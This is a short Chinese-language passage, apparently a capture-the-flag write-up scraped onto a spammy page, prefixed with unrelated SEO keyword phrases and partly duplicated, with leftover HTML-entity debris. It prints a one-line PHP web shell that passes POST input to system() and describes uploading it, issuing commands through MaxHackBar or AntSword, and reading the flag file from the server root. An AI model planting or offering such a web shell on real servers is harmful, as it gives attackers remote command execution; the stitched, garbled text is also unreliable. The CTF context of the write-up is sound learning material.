网站建设论文选题,上网出现危险网站,企业手机网站建设策划书,python入门教程完整版构造一句话PHP木马
?php eval(system($_POST[shell])); ?
利用eval函数解析$shell的值使得服务器执行system命令
eval函数是无法直接执行命令的#xff0c;只能把字符串当作php代码解析
这里我们构造的木马是POST的方式上传#xff0c;那就用MaxHacKBar来执行 …
构造一句话PHP木马
?php eval(system($_POST[shell])); ?
利用eval函数解析$shell的值使得服务器执行system命令
eval函数是无法直接执行命令的只能把字符串当作php代码解析
这里我们构造的木马是POST的方式上传那就用MaxHacKBar来执行 创建好的木马上传后记下这个路径 点击Load URL并且把刚才我们上传的文件路径粘贴到后面
接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了 最后也是在根目录下找到了flag cat一下flag 经测试这里发现直接用一句话木马用蚁剑连接也是可以成功的 也是可以在根目录找到flag flag{f0884217-495e-4d3f-b825-2f3b55a223a2}
